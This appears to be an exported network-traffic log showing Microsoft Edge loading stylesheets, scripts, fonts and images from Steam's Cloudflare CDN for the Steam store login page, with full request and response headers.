date: Fri, 03 Nov 2023 04:49:49 GMT
content-type: text/css;charset=UTF-8
content-length: 11792
cache-control: public,max-age=15552000
expires: Mon, 15 Apr 2024 20:49:54 GMT
etag: "PUI5e8sxLsB9"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 268010
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe2f3eca0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/css/v6/store.css?v=UrrY32e1y1Zc&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/css/v6/store.css?v=UrrY32e1y1Zc&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:49 GMT
content-type: text/javascript;charset=UTF-8
content-length: 4229
cache-control: public,max-age=15552000
expires: Mon, 11 Mar 2024 23:26:19 GMT
etag: ".zYHOpI1L3Rt0"
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 2307683
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe2f3ecc0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/css/v6/cart.css?v=PUI5e8sxLsB9&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/css/v6/cart.css?v=PUI5e8sxLsB9&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:49 GMT
content-type: text/javascript;charset=UTF-8
content-length: 19710
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:38:05 GMT
etag: "aVwmJL6U2Amu"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 3219104
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe2f3ecf0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nliU&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nliU&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:49 GMT
content-type: text/javascript;charset=UTF-8
content-length: 36970
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:28:04 GMT
etag: "3Pb1f2YLp788"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 195705
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe2f3ecd0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:49 GMT
content-type: text/javascript;charset=UTF-8
content-length: 33382
cache-control: public,max-age=15552000
expires: Wed, 17 Apr 2024 21:56:15 GMT
etag: ".TZ2NKhB-nliU"
last-modified: Wed, 28 Jun 2023 04:07:11 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 268094
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe2f3ecb0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=3Pb1f2YLp788&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/javascript/shared_global.js?v=3Pb1f2YLp788&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:49 GMT
content-type: text/css;charset=UTF-8
content-length: 633
cache-control: public,max-age=15552000
expires: Sun, 14 Jan 2024 06:24:46 GMT
etag: "2C1Oh9QFVTyK"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 2299742
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe2f3ec50b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/main.js?v=aVwmJL6U2Amu&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/main.js?v=aVwmJL6U2Amu&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:50 GMT
content-type: text/css;charset=UTF-8
content-length: 30732
cache-control: public,max-age=0,must-revalidate
expires: Sun, 09 Sep 2001 01:46:40 GMT
etag: "6UwcjdFMHtDS"
last-modified: Wed, 08 Apr 1970 22:48:02 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: MISS
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe2f3ec80b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/css/login.css?v=N_ALu0tisSbF&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/css/login.css?v=N_ALu0tisSbF&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:50 GMT
content-type: text/css;charset=UTF-8
content-length: 3985
cache-control: public,max-age=15552000
expires: Sun, 18 Feb 2024 23:31:20 GMT
etag: "N_ALu0tisSbF"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 177551
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe3128600b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=CG8Em6e-Ozq3&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/css/shared_responsive.css?v=CG8Em6e-Ozq3&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:50 GMT
content-type: text/css;charset=UTF-8
content-length: 5737
cache-control: public,max-age=15552000
expires: Sat, 30 Mar 2024 05:49:59 GMT
etag: "CG8Em6e-Ozq3"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 2293767
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe31386f0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/dynamicstore.js?v=zT0Cl5vv5AfQ&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/dynamicstore.js?v=zT0Cl5vv5AfQ&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:50 GMT
content-type: text/javascript;charset=UTF-8
content-length: 19666
cache-control: public,max-age=15552000
expires: Sun, 17 Mar 2024 23:12:50 GMT
etag: "zT0Cl5vv5AfQ"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 3821818
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe32a9a70b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/login.js?v=uyGwRKXH0yy-&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/javascript/login.js?v=uyGwRKXH0yy-&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:50 GMT
content-type: text/javascript;charset=UTF-8
content-length: 10894
cache-control: public,max-age=15552000
expires: Sat, 16 Dec 2023 17:11:10 GMT
etag: "uyGwRKXH0yy-"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 3821783
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe34db720b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:52 GMT
content-type: text/javascript;charset=UTF-8
content-length: 6238
cache-control: public,max-age=15552000
expires: Sat, 28 Oct 2023 23:45:36 GMT
etag: "pSvIAKtunfWg"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: HIT
cf-cache-status: HIT
age: 2310051
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe3c5a6e0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/images/responsive/logo_valve_footer.png HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:52 GMT
content-type: image/png
content-length: 1846
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
etag: "649bb1f0-736"
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 6066
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe3e8c7d0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/images/responsive/header_menu_hamburger.png HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:52 GMT
content-type: image/png
content-length: 3777
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
etag: "649bb1f0-ec1"
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 700
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe400da90b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/images/responsive/header_logo.png HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:53 GMT
content-type: image/png
content-length: 10863
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
etag: "649bb1f0-2a6f"
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 3045
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe461af10b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/fonts/MotivaSans-Regular.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: application/octet-stream
content-length: 122684
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1df3c"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 6590
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe487ce60b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/images/header/logo_steam.svg?t=962016 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: image/svg+xml
last-modified: Wed, 28 Jun 2023 04:07:11 GMT
etag: W/"649bb1ef-e64"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 702
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe488ce90b4e-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/fonts/MotivaSans-Light.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: application/octet-stream
content-length: 122660
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1df24"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 1208
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe489d0a0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/css/applications/store/main.css?v=y_m6n_ZC_62-&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/css/applications/store/main.css?v=y_m6n_ZC_62-&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/css;charset=UTF-8
content-length: 31662
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:28:04 GMT
etag: "y_m6n_ZC_62-"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 87634
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe48ad190b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Thin.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/fonts/MotivaSans-Thin.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: application/octet-stream
content-length: 118736
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1cfd0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 5982
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe494d940b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/manifest.js?v=K5-uZrq_vscJ&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/manifest.js?v=K5-uZrq_vscJ&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 8151
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:28:04 GMT
etag: "K5-uZrq_vscJ"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 195710
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe496da30b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Medium.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/fonts/MotivaSans-Medium.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: application/octet-stream
content-length: 124048
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1e490"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 2189
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe496dab0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/libraries~b28b7af69.js?v=G-QhFEbs3hfP&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/libraries~b28b7af69.js?v=G-QhFEbs3hfP&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 249419
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:28:04 GMT
etag: "G-QhFEbs3hfP"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 195709
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe496dac0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Bold.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/fonts/MotivaSans-Bold.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: application/octet-stream
content-length: 123884
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1e3ec"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 5983
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe496db00b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/main.js?v=uMd6ltecQnHV&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/main.js?v=uMd6ltecQnHV&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 205720
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:28:04 GMT
etag: "uMd6ltecQnHV"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 166537
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe496db40b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: application/octet-stream
content-length: 135500
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-2114c"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 3248
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe497db90b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/images/v6/logo_steam_footer.png

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/images/v6/logo_steam_footer.png HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: image/png
content-length: 2843
last-modified: Wed, 28 Jun 2023 04:07:22 GMT
etag: "649bb1fa-b1b"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 3002
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe497dbc0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: application/octet-stream
content-length: 133600
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-209e0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 5750
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe497dc50b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/images/footerLogo_valve_new.png

